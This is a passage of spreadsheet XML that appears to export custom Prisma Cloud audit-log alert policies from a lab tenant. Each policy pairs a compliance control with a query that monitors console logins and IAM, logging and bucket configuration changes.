      <c r="AC2630" t="inlineStr"/>
      <c r="AD2630" t="b">
        <v>0</v>
      </c>
      <c r="AE2630" t="inlineStr">
        <is>
          <t>custom</t>
        </is>
      </c>
      <c r="AF2630" t="inlineStr">
        <is>
          <t>incident</t>
        </is>
      </c>
      <c r="AG26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0" t="inlineStr">
        <is>
          <t>1fb6705d-c773-4340-bcea-a5c55e92e47b</t>
        </is>
      </c>
      <c r="AI2630" t="inlineStr">
        <is>
          <t>63cdb3fa-9f49-41f0-900c-52bcb3fc6e19</t>
        </is>
      </c>
      <c r="AJ2630" t="inlineStr">
        <is>
          <t>true</t>
        </is>
      </c>
      <c r="AK2630" t="inlineStr">
        <is>
          <t>Discovered 2024/11/19/15:03</t>
        </is>
      </c>
    </row>
    <row r="2631">
      <c r="A2631" t="inlineStr">
        <is>
          <t>CIS v1.4.0 (AWS)</t>
        </is>
      </c>
      <c r="B2631" s="2" t="inlineStr">
        <is>
          <t>NO</t>
        </is>
      </c>
      <c r="C2631" s="2" t="inlineStr"/>
      <c r="D2631" t="inlineStr"/>
      <c r="E2631" t="inlineStr"/>
      <c r="F2631" t="inlineStr"/>
      <c r="G2631" t="b">
        <v>0</v>
      </c>
      <c r="H2631" t="inlineStr">
        <is>
          <t>BG-AH-Email-Test, BPtestTag, Default Alert Rule, JEC-Find all Security Groups that opens port 22 to the internet (and are attached to an EC2 instance)., New Azure Subscription Created, PCS Demo  - Prisma Cloud XSOAR Filter, PCS Demo Compute Alert Test, Ranti-Jira-Alert-rule, Ranti-console-login-alert, anomalies-avega, ar-vstoyko, cj_test_tagBased, jbrox-AlertRule-MSTeams-Email, mark davis test 412024, pagerduty-test, splunk-test</t>
        </is>
      </c>
      <c r="I2631" t="inlineStr">
        <is>
          <t>all</t>
        </is>
      </c>
      <c r="J2631" t="inlineStr">
        <is>
          <t>cloud.audit_logs</t>
        </is>
      </c>
      <c r="K2631" t="inlineStr">
        <is>
          <t>Ranti-console-login-test</t>
        </is>
      </c>
      <c r="L2631" t="inlineStr"/>
      <c r="M2631" t="inlineStr">
        <is>
          <t>medium</t>
        </is>
      </c>
      <c r="N2631" t="inlineStr">
        <is>
          <t>APP2 Prisma Cloud Customer Success Lab- 5418164167018798048</t>
        </is>
      </c>
      <c r="O2631" t="inlineStr">
        <is>
          <t>audit_event</t>
        </is>
      </c>
      <c r="P2631" t="inlineStr">
        <is>
          <t>audit</t>
        </is>
      </c>
      <c r="Q2631" t="inlineStr">
        <is>
          <t>Logging</t>
        </is>
      </c>
      <c r="R2631" t="inlineStr">
        <is>
          <t>3.11</t>
        </is>
      </c>
      <c r="S2631" t="inlineStr">
        <is>
          <t>audit_event,custom</t>
        </is>
      </c>
      <c r="T2631" t="b">
        <v>0</v>
      </c>
      <c r="U2631" t="inlineStr">
        <is>
          <t>privileged_activity_monitoring</t>
        </is>
      </c>
      <c r="V2631" t="inlineStr">
        <is>
          <t>cloud.audit_logs</t>
        </is>
      </c>
      <c r="W2631" t="inlineStr"/>
      <c r="X2631" t="inlineStr"/>
      <c r="Y2631" t="inlineStr"/>
      <c r="Z2631" t="inlineStr">
        <is>
          <t>event from cloud.audit_logs where operation = 'ConsoleLogin'</t>
        </is>
      </c>
      <c r="AA2631" t="inlineStr">
        <is>
          <t>Marius Banica</t>
        </is>
      </c>
      <c r="AB2631" t="inlineStr">
        <is>
          <t>2024-09-13 16:54:03</t>
        </is>
      </c>
      <c r="AC2631" t="inlineStr"/>
      <c r="AD2631" t="b">
        <v>0</v>
      </c>
      <c r="AE2631" t="inlineStr">
        <is>
          <t>custom</t>
        </is>
      </c>
      <c r="AF2631" t="inlineStr">
        <is>
          <t>incident</t>
        </is>
      </c>
      <c r="AG26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Ranti-console-login-alert - Notifications:jira, AccountGroups:Ranti-Account-Group;,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31" t="inlineStr">
        <is>
          <t>141d540c-461c-4480-b658-c20b177f55b1</t>
        </is>
      </c>
      <c r="AI2631" t="inlineStr">
        <is>
          <t>b4e263b2-7078-4a19-9592-28159883e8b4</t>
        </is>
      </c>
      <c r="AJ2631" t="inlineStr">
        <is>
          <t>true</t>
        </is>
      </c>
      <c r="AK2631" t="inlineStr">
        <is>
          <t>Discovered 2024/11/19/15:03</t>
        </is>
      </c>
    </row>
    <row r="2632">
      <c r="A2632" t="inlineStr">
        <is>
          <t>ACSC Information Security Manual (ISM)</t>
        </is>
      </c>
      <c r="B2632" s="2" t="inlineStr">
        <is>
          <t>NO</t>
        </is>
      </c>
      <c r="C2632" s="2" t="inlineStr"/>
      <c r="D2632" t="inlineStr"/>
      <c r="E2632" t="inlineStr"/>
      <c r="F2632" t="inlineStr"/>
      <c r="G2632" t="b">
        <v>0</v>
      </c>
      <c r="H26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2" t="inlineStr">
        <is>
          <t>all</t>
        </is>
      </c>
      <c r="J2632" t="inlineStr">
        <is>
          <t>cloud.audit_logs</t>
        </is>
      </c>
      <c r="K2632" t="inlineStr">
        <is>
          <t>Custom for ALERT RULE</t>
        </is>
      </c>
      <c r="L2632" t="inlineStr"/>
      <c r="M2632" t="inlineStr">
        <is>
          <t>medium</t>
        </is>
      </c>
      <c r="N2632" t="inlineStr">
        <is>
          <t>APP2 Prisma Cloud Customer Success Lab- 5418164167018798048</t>
        </is>
      </c>
      <c r="O2632" t="inlineStr">
        <is>
          <t>audit_event</t>
        </is>
      </c>
      <c r="P2632" t="inlineStr">
        <is>
          <t>audit</t>
        </is>
      </c>
      <c r="Q2632" t="inlineStr">
        <is>
          <t>Guidelines for Cyber Security Roles</t>
        </is>
      </c>
      <c r="R2632" t="inlineStr">
        <is>
          <t>ISM-0714</t>
        </is>
      </c>
      <c r="S2632" t="inlineStr"/>
      <c r="T2632" t="b">
        <v>0</v>
      </c>
      <c r="U2632" t="inlineStr">
        <is>
          <t>privileged_activity_monitoring</t>
        </is>
      </c>
      <c r="V2632" t="inlineStr">
        <is>
          <t>cloud.audit_logs</t>
        </is>
      </c>
      <c r="W2632" t="inlineStr">
        <is>
          <t>sdf</t>
        </is>
      </c>
      <c r="X2632" t="inlineStr">
        <is>
          <t>sdfsdf</t>
        </is>
      </c>
      <c r="Y2632" t="inlineStr"/>
      <c r="Z2632" t="inlineStr">
        <is>
          <t>event from cloud.audit_logs where operation IN ( 'ConsoleLogin' )</t>
        </is>
      </c>
      <c r="AA2632" t="inlineStr">
        <is>
          <t>Marius Banica</t>
        </is>
      </c>
      <c r="AB2632" t="inlineStr">
        <is>
          <t>2024-09-13 16:51:21</t>
        </is>
      </c>
      <c r="AC2632" t="inlineStr"/>
      <c r="AD2632" t="b">
        <v>0</v>
      </c>
      <c r="AE2632" t="inlineStr">
        <is>
          <t>custom</t>
        </is>
      </c>
      <c r="AF2632" t="inlineStr">
        <is>
          <t>incident</t>
        </is>
      </c>
      <c r="AG26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2" t="inlineStr">
        <is>
          <t>d003f1d1-192c-4014-a480-9a0492ec86bc</t>
        </is>
      </c>
      <c r="AI2632" t="inlineStr">
        <is>
          <t>a7ea45f6-6f3d-4fb3-be4f-e784cafba1e1</t>
        </is>
      </c>
      <c r="AJ2632" t="inlineStr">
        <is>
          <t>true</t>
        </is>
      </c>
      <c r="AK2632" t="inlineStr">
        <is>
          <t>Discovered 2024/11/19/15:03</t>
        </is>
      </c>
    </row>
    <row r="2633">
      <c r="A2633" t="inlineStr"/>
      <c r="B2633" s="2" t="inlineStr">
        <is>
          <t>NO</t>
        </is>
      </c>
      <c r="C2633" s="2" t="inlineStr"/>
      <c r="D2633" t="inlineStr"/>
      <c r="E2633" t="inlineStr"/>
      <c r="F2633" t="inlineStr"/>
      <c r="G2633" t="b">
        <v>0</v>
      </c>
      <c r="H26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3" t="inlineStr">
        <is>
          <t>all</t>
        </is>
      </c>
      <c r="J2633" t="inlineStr">
        <is>
          <t>cloud.audit_logs</t>
        </is>
      </c>
      <c r="K2633" t="inlineStr">
        <is>
          <t>Generate Alerts</t>
        </is>
      </c>
      <c r="L2633" t="inlineStr"/>
      <c r="M2633" t="inlineStr">
        <is>
          <t>high</t>
        </is>
      </c>
      <c r="N2633" t="inlineStr">
        <is>
          <t>APP2 Prisma Cloud Customer Success Lab- 5418164167018798048</t>
        </is>
      </c>
      <c r="O2633" t="inlineStr">
        <is>
          <t>audit_event</t>
        </is>
      </c>
      <c r="P2633" t="inlineStr">
        <is>
          <t>audit</t>
        </is>
      </c>
      <c r="Q2633" t="inlineStr"/>
      <c r="R2633" t="inlineStr"/>
      <c r="S2633" t="inlineStr"/>
      <c r="T2633" t="b">
        <v>0</v>
      </c>
      <c r="U2633" t="inlineStr">
        <is>
          <t>privileged_activity_monitoring</t>
        </is>
      </c>
      <c r="V2633" t="inlineStr">
        <is>
          <t>cloud.audit_logs</t>
        </is>
      </c>
      <c r="W2633" t="inlineStr"/>
      <c r="X2633" t="inlineStr"/>
      <c r="Y2633" t="inlineStr"/>
      <c r="Z2633" t="inlineStr">
        <is>
          <t>event from cloud.audit_logs where cloud.account != 'string'</t>
        </is>
      </c>
      <c r="AA2633" t="inlineStr">
        <is>
          <t>Brandon Goldstein</t>
        </is>
      </c>
      <c r="AB2633" t="inlineStr">
        <is>
          <t>2024-09-13 17:20:49</t>
        </is>
      </c>
      <c r="AC2633" t="inlineStr"/>
      <c r="AD2633" t="b">
        <v>0</v>
      </c>
      <c r="AE2633" t="inlineStr">
        <is>
          <t>custom</t>
        </is>
      </c>
      <c r="AF2633" t="inlineStr">
        <is>
          <t>incident</t>
        </is>
      </c>
      <c r="AG26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3" t="inlineStr">
        <is>
          <t>d44fa5d1-b392-43b0-a605-4ac74597ac3b</t>
        </is>
      </c>
      <c r="AI2633" t="inlineStr">
        <is>
          <t>7ff43f73-7bba-421e-a82d-83cdf32edc50</t>
        </is>
      </c>
      <c r="AJ2633" t="inlineStr">
        <is>
          <t>true</t>
        </is>
      </c>
      <c r="AK2633" t="inlineStr">
        <is>
          <t>Discovered 2024/11/19/15:03</t>
        </is>
      </c>
    </row>
    <row r="2634">
      <c r="A2634" t="inlineStr"/>
      <c r="B2634" s="2" t="inlineStr">
        <is>
          <t>NO</t>
        </is>
      </c>
      <c r="C2634" s="2" t="inlineStr"/>
      <c r="D2634" t="inlineStr"/>
      <c r="E2634" t="inlineStr"/>
      <c r="F2634" t="inlineStr"/>
      <c r="G2634" t="b">
        <v>0</v>
      </c>
      <c r="H26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4" t="inlineStr">
        <is>
          <t>all</t>
        </is>
      </c>
      <c r="J2634" t="inlineStr">
        <is>
          <t>cloud.audit_logs</t>
        </is>
      </c>
      <c r="K2634" t="inlineStr">
        <is>
          <t>test_audit_migrate</t>
        </is>
      </c>
      <c r="L2634" t="inlineStr"/>
      <c r="M2634" t="inlineStr">
        <is>
          <t>low</t>
        </is>
      </c>
      <c r="N2634" t="inlineStr">
        <is>
          <t>APP2 Prisma Cloud Customer Success Lab- 5418164167018798048</t>
        </is>
      </c>
      <c r="O2634" t="inlineStr">
        <is>
          <t>audit_event</t>
        </is>
      </c>
      <c r="P2634" t="inlineStr">
        <is>
          <t>audit</t>
        </is>
      </c>
      <c r="Q2634" t="inlineStr"/>
      <c r="R2634" t="inlineStr"/>
      <c r="S2634" t="inlineStr"/>
      <c r="T2634" t="b">
        <v>0</v>
      </c>
      <c r="U2634" t="inlineStr">
        <is>
          <t>privileged_activity_monitoring</t>
        </is>
      </c>
      <c r="V2634" t="inlineStr">
        <is>
          <t>cloud.audit_logs</t>
        </is>
      </c>
      <c r="W2634" t="inlineStr"/>
      <c r="X2634" t="inlineStr"/>
      <c r="Y2634" t="inlineStr"/>
      <c r="Z2634" t="inlineStr">
        <is>
          <t>event from cloud.audit_logs where operation IN ('AttachGroupPolicy', 'AttachRolePolicy', 'DeleteGroupPolicy', 'DeleteKeyPair', 'DeleteLogGroup')</t>
        </is>
      </c>
      <c r="AA2634" t="inlineStr">
        <is>
          <t>Brandon Goldstein</t>
        </is>
      </c>
      <c r="AB2634" t="inlineStr">
        <is>
          <t>2024-09-13 17:15:01</t>
        </is>
      </c>
      <c r="AC2634" t="inlineStr"/>
      <c r="AD2634" t="b">
        <v>0</v>
      </c>
      <c r="AE2634" t="inlineStr">
        <is>
          <t>custom</t>
        </is>
      </c>
      <c r="AF2634" t="inlineStr">
        <is>
          <t>incident</t>
        </is>
      </c>
      <c r="AG26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4" t="inlineStr">
        <is>
          <t>ef090ebe-afb9-4cfe-8486-8fb383e3029f</t>
        </is>
      </c>
      <c r="AI2634" t="inlineStr">
        <is>
          <t>13e4f3c8-e6b5-47cb-95f6-ba1ab7e81796</t>
        </is>
      </c>
      <c r="AJ2634" t="inlineStr">
        <is>
          <t>true</t>
        </is>
      </c>
      <c r="AK2634" t="inlineStr">
        <is>
          <t>Discovered 2024/11/19/15:03</t>
        </is>
      </c>
    </row>
    <row r="2635">
      <c r="A2635" t="inlineStr">
        <is>
          <t>croy-test</t>
        </is>
      </c>
      <c r="B2635" s="2" t="inlineStr">
        <is>
          <t>REVIEW</t>
        </is>
      </c>
      <c r="C2635" s="2" t="inlineStr"/>
      <c r="D2635" t="n">
        <v>0</v>
      </c>
      <c r="E2635" t="n">
        <v>165</v>
      </c>
      <c r="F2635" t="n">
        <v>1</v>
      </c>
      <c r="G2635" t="b">
        <v>1</v>
      </c>
      <c r="H26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35" t="inlineStr">
        <is>
          <t>all</t>
        </is>
      </c>
      <c r="J2635" t="inlineStr">
        <is>
          <t>cloud.audit_logs</t>
        </is>
      </c>
      <c r="K2635" t="inlineStr">
        <is>
          <t>event-policy</t>
        </is>
      </c>
      <c r="L2635" t="inlineStr"/>
      <c r="M2635" t="inlineStr">
        <is>
          <t>medium</t>
        </is>
      </c>
      <c r="N2635" t="inlineStr">
        <is>
          <t>APP2 Prisma Cloud Customer Success Lab- 5418164167018798048</t>
        </is>
      </c>
      <c r="O2635" t="inlineStr">
        <is>
          <t>audit_event</t>
        </is>
      </c>
      <c r="P2635" t="inlineStr">
        <is>
          <t>audit</t>
        </is>
      </c>
      <c r="Q2635" t="inlineStr">
        <is>
          <t>90</t>
        </is>
      </c>
      <c r="R2635" t="inlineStr">
        <is>
          <t>98</t>
        </is>
      </c>
      <c r="S2635" t="inlineStr">
        <is>
          <t>CloudTrail</t>
        </is>
      </c>
      <c r="T2635" t="b">
        <v>0</v>
      </c>
      <c r="U2635" t="inlineStr">
        <is>
          <t>privileged_activity_monitoring</t>
        </is>
      </c>
      <c r="V2635" t="inlineStr">
        <is>
          <t>cloud.audit_logs</t>
        </is>
      </c>
      <c r="W2635" t="inlineStr">
        <is>
          <t>event</t>
        </is>
      </c>
      <c r="X2635" t="inlineStr"/>
      <c r="Y2635" t="inlineStr"/>
      <c r="Z2635" t="inlineStr">
        <is>
          <t>event from cloud.audit_logs where operation = 'ConsoleLogin' AND json.rule = $.eventTime contains 'T18' OR $.eventTime contains 'T19' OR $.eventTime contains 'T20' OR $.eventTime contains 'T21'</t>
        </is>
      </c>
      <c r="AA2635" t="inlineStr">
        <is>
          <t>Adam Hamilton-Sutherland</t>
        </is>
      </c>
      <c r="AB2635" t="inlineStr">
        <is>
          <t>2024-09-19 15:51:13</t>
        </is>
      </c>
      <c r="AC2635" t="inlineStr"/>
      <c r="AD2635" t="b">
        <v>0</v>
      </c>
      <c r="AE2635" t="inlineStr">
        <is>
          <t>custom</t>
        </is>
      </c>
      <c r="AF2635" t="inlineStr">
        <is>
          <t>incident</t>
        </is>
      </c>
      <c r="AG26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35" t="inlineStr">
        <is>
          <t>5b096843-7e24-43a6-9c1d-a6f5d75aba6d</t>
        </is>
      </c>
      <c r="AI2635" t="inlineStr">
        <is>
          <t>ca6cb351-fc5c-4dd9-b05e-8aaddbb30600</t>
        </is>
      </c>
      <c r="AJ2635" t="inlineStr">
        <is>
          <t>true</t>
        </is>
      </c>
      <c r="AK2635" t="inlineStr">
        <is>
          <t>Discovered 2024/11/19/15:03</t>
        </is>
      </c>
    </row>
    <row r="2636">
      <c r="A2636" t="inlineStr">
        <is>
          <t>Azure Security Benchmark (v3)</t>
        </is>
      </c>
      <c r="B2636" s="2" t="inlineStr">
        <is>
          <t>NO</t>
        </is>
      </c>
      <c r="C2636" s="2" t="inlineStr"/>
      <c r="D2636" t="inlineStr"/>
      <c r="E2636" t="inlineStr"/>
      <c r="F2636" t="inlineStr"/>
      <c r="G2636" t="b">
        <v>0</v>
      </c>
      <c r="H26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6" t="inlineStr">
        <is>
          <t>all</t>
        </is>
      </c>
      <c r="J2636" t="inlineStr">
        <is>
          <t>cloud.audit_logs</t>
        </is>
      </c>
      <c r="K2636" t="inlineStr">
        <is>
          <t>Copy of Stella audit test1</t>
        </is>
      </c>
      <c r="L2636" t="inlineStr"/>
      <c r="M2636" t="inlineStr">
        <is>
          <t>low</t>
        </is>
      </c>
      <c r="N2636" t="inlineStr">
        <is>
          <t>APP2 Prisma Cloud Customer Success Lab- 5418164167018798048</t>
        </is>
      </c>
      <c r="O2636" t="inlineStr">
        <is>
          <t>audit_event</t>
        </is>
      </c>
      <c r="P2636" t="inlineStr">
        <is>
          <t>audit</t>
        </is>
      </c>
      <c r="Q2636" t="inlineStr">
        <is>
          <t>Data Protection (DP)</t>
        </is>
      </c>
      <c r="R2636" t="inlineStr">
        <is>
          <t>DP-3</t>
        </is>
      </c>
      <c r="S2636" t="inlineStr"/>
      <c r="T2636" t="b">
        <v>0</v>
      </c>
      <c r="U2636" t="inlineStr">
        <is>
          <t>privileged_activity_monitoring</t>
        </is>
      </c>
      <c r="V2636" t="inlineStr">
        <is>
          <t>cloud.audit_logs</t>
        </is>
      </c>
      <c r="W2636" t="inlineStr"/>
      <c r="X2636" t="inlineStr"/>
      <c r="Y2636" t="inlineStr"/>
      <c r="Z2636" t="inlineStr">
        <is>
          <t>event from cloud.audit_logs where cloud.service = 'amazonmq.amazonaws.com'</t>
        </is>
      </c>
      <c r="AA2636" t="inlineStr">
        <is>
          <t>Brandon Goldstein</t>
        </is>
      </c>
      <c r="AB2636" t="inlineStr">
        <is>
          <t>2024-09-13 17:16:27</t>
        </is>
      </c>
      <c r="AC2636" t="inlineStr"/>
      <c r="AD2636" t="b">
        <v>0</v>
      </c>
      <c r="AE2636" t="inlineStr">
        <is>
          <t>custom</t>
        </is>
      </c>
      <c r="AF2636" t="inlineStr">
        <is>
          <t>incident</t>
        </is>
      </c>
      <c r="AG26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6" t="inlineStr">
        <is>
          <t>578fbd85-8261-454b-ae26-5425e70c3bab</t>
        </is>
      </c>
      <c r="AI2636" t="inlineStr">
        <is>
          <t>ab238091-5d92-43b3-ba27-80222ed1668d</t>
        </is>
      </c>
      <c r="AJ2636" t="inlineStr">
        <is>
          <t>true</t>
        </is>
      </c>
      <c r="AK2636" t="inlineStr">
        <is>
          <t>Discovered 2024/11/19/15:03</t>
        </is>
      </c>
    </row>
    <row r="2637">
      <c r="A2637" t="inlineStr">
        <is>
          <t>HITRUST CSF v.9.6.0</t>
        </is>
      </c>
      <c r="B2637" s="2" t="inlineStr">
        <is>
          <t>NO</t>
        </is>
      </c>
      <c r="C2637" s="2" t="inlineStr"/>
      <c r="D2637" t="inlineStr"/>
      <c r="E2637" t="inlineStr"/>
      <c r="F2637" t="inlineStr"/>
      <c r="G2637" t="b">
        <v>0</v>
      </c>
      <c r="H26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37" t="inlineStr">
        <is>
          <t>all</t>
        </is>
      </c>
      <c r="J2637" t="inlineStr">
        <is>
          <t>cloud.audit_logs</t>
        </is>
      </c>
      <c r="K2637" t="inlineStr">
        <is>
          <t>Audit change test 01 - alagomez</t>
        </is>
      </c>
      <c r="L2637" t="inlineStr"/>
      <c r="M2637" t="inlineStr">
        <is>
          <t>medium</t>
        </is>
      </c>
      <c r="N2637" t="inlineStr">
        <is>
          <t>APP2 Prisma Cloud Customer Success Lab- 5418164167018798048</t>
        </is>
      </c>
      <c r="O2637" t="inlineStr">
        <is>
          <t>audit_event</t>
        </is>
      </c>
      <c r="P2637" t="inlineStr">
        <is>
          <t>audit</t>
        </is>
      </c>
      <c r="Q2637" t="inlineStr">
        <is>
          <t>Control Category: 13.0</t>
        </is>
      </c>
      <c r="R2637" t="inlineStr">
        <is>
          <t>13.s</t>
        </is>
      </c>
      <c r="S2637" t="inlineStr"/>
      <c r="T2637" t="b">
        <v>0</v>
      </c>
      <c r="U2637" t="inlineStr">
        <is>
          <t>privileged_activity_monitoring</t>
        </is>
      </c>
      <c r="V2637" t="inlineStr">
        <is>
          <t>cloud.audit_logs</t>
        </is>
      </c>
      <c r="W2637" t="inlineStr">
        <is>
          <t>Test of Custom Policy
Detección de cambios potencialmente sensibles o sospechosos en los ajustes de configuración_version final</t>
        </is>
      </c>
      <c r="X2637" t="inlineStr">
        <is>
          <t>NA</t>
        </is>
      </c>
      <c r="Y2637" t="inlineStr"/>
      <c r="Z2637" t="inlineStr">
        <is>
          <t>event from cloud.audit_logs where operation IN ('DeleteBucket', 'DeleteConfigRule', 'DeleteTrail', 'PutBucketAcl', 'PutBucketLogging', 'PutBucketPolicy') AND subject does not match 'redlock' OR subject does not match 'awscloudformation'</t>
        </is>
      </c>
      <c r="AA2637" t="inlineStr">
        <is>
          <t>Adam Hamilton-Sutherland</t>
        </is>
      </c>
      <c r="AB2637" t="inlineStr">
        <is>
          <t>2024-09-19 15:48:47</t>
        </is>
      </c>
      <c r="AC2637" t="inlineStr"/>
      <c r="AD2637" t="b">
        <v>0</v>
      </c>
      <c r="AE2637" t="inlineStr">
        <is>
          <t>custom</t>
        </is>
      </c>
      <c r="AF2637" t="inlineStr">
        <is>
          <t>incident</t>
        </is>
      </c>
      <c r="AG26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37" t="inlineStr">
        <is>
          <t>a0c154a6-affb-439a-8a73-e7138d2285e7</t>
        </is>
      </c>
      <c r="AI2637" t="inlineStr">
        <is>
          <t>2cd8443e-9ea5-423b-ad9a-d7e095493b66</t>
        </is>
      </c>
      <c r="AJ2637" t="inlineStr">
        <is>
          <t>true</t>
        </is>
      </c>
      <c r="AK2637" t="inlineStr">
        <is>
          <t>Discovered 2024/11/19/15:03</t>
        </is>
      </c>
    </row>
    <row r="2638">
      <c r="A2638" t="inlineStr">
        <is>
          <t>HITRUST CSF v.9.6.0</t>
        </is>
      </c>
      <c r="B2638" s="2" t="inlineStr">
        <is>
          <t>NO</t>
        </is>
      </c>
      <c r="C2638" s="2" t="inlineStr"/>
      <c r="D2638" t="inlineStr"/>
      <c r="E2638" t="inlineStr"/>
      <c r="F2638" t="inlineStr"/>
      <c r="G2638" t="b">
        <v>0</v>
      </c>
      <c r="H26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38" t="inlineStr">
        <is>
          <t>all</t>
        </is>
      </c>
      <c r="J2638" t="inlineStr">
        <is>
          <t>cloud.audit_logs</t>
        </is>
      </c>
      <c r="K2638" t="inlineStr">
        <is>
          <t>Audit change test 02 - alagomez</t>
        </is>
      </c>
      <c r="L2638" t="inlineStr"/>
      <c r="M2638" t="inlineStr">
        <is>
          <t>medium</t>
        </is>
      </c>
      <c r="N2638" t="inlineStr">
        <is>
          <t>APP2 Prisma Cloud Customer Success Lab- 5418164167018798048</t>
        </is>
      </c>
      <c r="O2638" t="inlineStr">
        <is>
          <t>audit_event</t>
        </is>
      </c>
      <c r="P2638" t="inlineStr">
        <is>
          <t>audit</t>
        </is>
      </c>
      <c r="Q2638" t="inlineStr">
        <is>
          <t>Control Category: 09.0</t>
        </is>
      </c>
      <c r="R2638" t="inlineStr">
        <is>
          <t>09.d</t>
        </is>
      </c>
      <c r="S2638" t="inlineStr"/>
      <c r="T2638" t="b">
        <v>0</v>
      </c>
      <c r="U2638" t="inlineStr">
        <is>
          <t>privileged_activity_monitoring</t>
        </is>
      </c>
      <c r="V2638" t="inlineStr">
        <is>
          <t>cloud.audit_logs</t>
        </is>
      </c>
      <c r="W2638" t="inlineStr">
        <is>
          <t>Detección de cambios realizados por los usuarios que son potencialmente sensibles o sospechosos en los ajustes de configuración_versionfinal</t>
        </is>
      </c>
      <c r="X2638" t="inlineStr"/>
      <c r="Y2638" t="inlineStr"/>
      <c r="Z2638" t="inlineStr">
        <is>
          <t>event from cloud.audit_logs where operation IN ( 'AddUserToGroup', 'AttachGroupPolicy', 'AttachGroupPolicy', 'AttachUserPolicy' , 'AttachRolePolicy' , 'CreateAccessKey', 'CreateKeyPair', 'DeleteKeyPair', 'DeleteLogGroup' ) AND subject does not match 'redlock' OR subject does not match 'awscloudformation'</t>
        </is>
      </c>
      <c r="AA2638" t="inlineStr">
        <is>
          <t>Adam Hamilton-Sutherland</t>
        </is>
      </c>
      <c r="AB2638" t="inlineStr">
        <is>
          <t>2024-09-19 15:48:07</t>
        </is>
      </c>
      <c r="AC2638" t="inlineStr"/>
      <c r="AD2638" t="b">
        <v>0</v>
      </c>
      <c r="AE2638" t="inlineStr">
        <is>
          <t>custom</t>
        </is>
      </c>
      <c r="AF2638" t="inlineStr">
        <is>
          <t>incident</t>
        </is>
      </c>
      <c r="AG26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38" t="inlineStr">
        <is>
          <t>62ce13dc-19f2-4fb4-b0b4-5c213f3a941f</t>
        </is>
      </c>
      <c r="AI2638" t="inlineStr">
        <is>
          <t>d7a3722f-3967-4dec-a007-21ab3c95ec4a</t>
        </is>
      </c>
      <c r="AJ2638" t="inlineStr">
        <is>
          <t>true</t>
        </is>
      </c>
      <c r="AK2638" t="inlineStr">
        <is>
          <t>Discovered 2024/11/19/15:03</t>
        </is>
      </c>
    </row>
    <row r="2639">
      <c r="A2639" t="inlineStr">
        <is>
          <t>HIPAA, CIS Controls v8</t>
        </is>
      </c>
      <c r="B2639" s="2" t="inlineStr">
        <is>
          <t>NO</t>
        </is>
      </c>
      <c r="C2639" s="2" t="inlineStr"/>
      <c r="D2639" t="inlineStr"/>
      <c r="E2639" t="inlineStr"/>
      <c r="F2639" t="inlineStr"/>
      <c r="G2639" t="b">
        <v>0</v>
      </c>
      <c r="H26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39" t="inlineStr">
        <is>
          <t>all</t>
        </is>
      </c>
      <c r="J2639" t="inlineStr">
        <is>
          <t>cloud.audit_logs</t>
        </is>
      </c>
      <c r="K2639" t="inlineStr">
        <is>
          <t>St.Config test</t>
        </is>
      </c>
      <c r="L2639" t="inlineStr"/>
      <c r="M2639" t="inlineStr">
        <is>
          <t>informational</t>
        </is>
      </c>
      <c r="N2639" t="inlineStr">
        <is>
          <t>APP2 Prisma Cloud Customer Success Lab- 5418164167018798048</t>
        </is>
      </c>
      <c r="O2639" t="inlineStr">
        <is>
          <t>audit_event</t>
        </is>
      </c>
      <c r="P2639" t="inlineStr">
        <is>
          <t>audit</t>
        </is>
      </c>
      <c r="Q2639" t="inlineStr">
        <is>
          <t>CIS Control 1</t>
        </is>
      </c>
      <c r="R2639" t="inlineStr">
        <is>
          <t>1.5</t>
        </is>
      </c>
      <c r="S2639" t="inlineStr"/>
      <c r="T2639" t="b">
        <v>0</v>
      </c>
      <c r="U2639" t="inlineStr">
        <is>
          <t>privileged_activity_monitoring</t>
        </is>
      </c>
      <c r="V2639" t="inlineStr">
        <is>
          <t>cloud.audit_logs</t>
        </is>
      </c>
      <c r="W2639" t="inlineStr"/>
      <c r="X2639" t="inlineStr"/>
      <c r="Y2639" t="inlineStr"/>
      <c r="Z2639" t="inlineStr">
        <is>
          <t>event from cloud.audit_logs where operation IN ( 'ConsoleLogin' )</t>
        </is>
      </c>
      <c r="AA2639" t="inlineStr">
        <is>
          <t>Brandon Goldstein</t>
        </is>
      </c>
      <c r="AB2639" t="inlineStr">
        <is>
          <t>2024-09-13 17:16:57</t>
        </is>
      </c>
      <c r="AC2639" t="inlineStr"/>
      <c r="AD2639" t="b">
        <v>0</v>
      </c>
      <c r="AE2639" t="inlineStr">
        <is>
          <t>custom</t>
        </is>
      </c>
      <c r="AF2639" t="inlineStr">
        <is>
          <t>incident</t>
        </is>
      </c>
      <c r="AG26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39" t="inlineStr">
        <is>
          <t>b937c859-29c0-4c31-9171-976a5defd43f</t>
        </is>
      </c>
      <c r="AI2639" t="inlineStr">
        <is>
          <t>a7ea45f6-6f3d-4fb3-be4f-e784cafba1e1</t>
        </is>
      </c>
      <c r="AJ2639" t="inlineStr">
        <is>
          <t>true</t>
        </is>
      </c>
      <c r="AK2639" t="inlineStr">
        <is>
          <t>Discovered 2024/11/19/15:03</t>
        </is>
      </c>
    </row>
    <row r="2640">
      <c r="A2640" t="inlineStr"/>
      <c r="B2640" s="2" t="inlineStr">
        <is>
          <t>NO</t>
        </is>
      </c>
      <c r="C2640" s="2" t="inlineStr"/>
      <c r="D2640" t="inlineStr"/>
      <c r="E2640" t="inlineStr"/>
      <c r="F2640" t="inlineStr"/>
      <c r="G2640" t="b">
        <v>0</v>
      </c>
      <c r="H26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0" t="inlineStr">
        <is>
          <t>all</t>
        </is>
      </c>
      <c r="J2640" t="inlineStr">
        <is>
          <t>cloud.audit_logs</t>
        </is>
      </c>
      <c r="K2640" t="inlineStr">
        <is>
          <t>jmontufar Audit</t>
        </is>
      </c>
      <c r="L2640" t="inlineStr"/>
      <c r="M2640" t="inlineStr">
        <is>
          <t>high</t>
        </is>
      </c>
      <c r="N2640" t="inlineStr">
        <is>
          <t>APP2 Prisma Cloud Customer Success Lab- 5418164167018798048</t>
        </is>
      </c>
      <c r="O2640" t="inlineStr">
        <is>
          <t>audit_event</t>
        </is>
      </c>
      <c r="P2640" t="inlineStr">
        <is>
          <t>audit</t>
        </is>
      </c>
      <c r="Q2640" t="inlineStr"/>
      <c r="R2640" t="inlineStr"/>
      <c r="S2640" t="inlineStr"/>
      <c r="T2640" t="b">
        <v>0</v>
      </c>
      <c r="U2640" t="inlineStr">
        <is>
          <t>privileged_activity_monitoring</t>
        </is>
      </c>
      <c r="V2640" t="inlineStr">
        <is>
          <t>cloud.audit_logs</t>
        </is>
      </c>
      <c r="W2640" t="inlineStr">
        <is>
          <t>Auditar si el usuario jmontufar ejecuto una operacion sobre una VM</t>
        </is>
      </c>
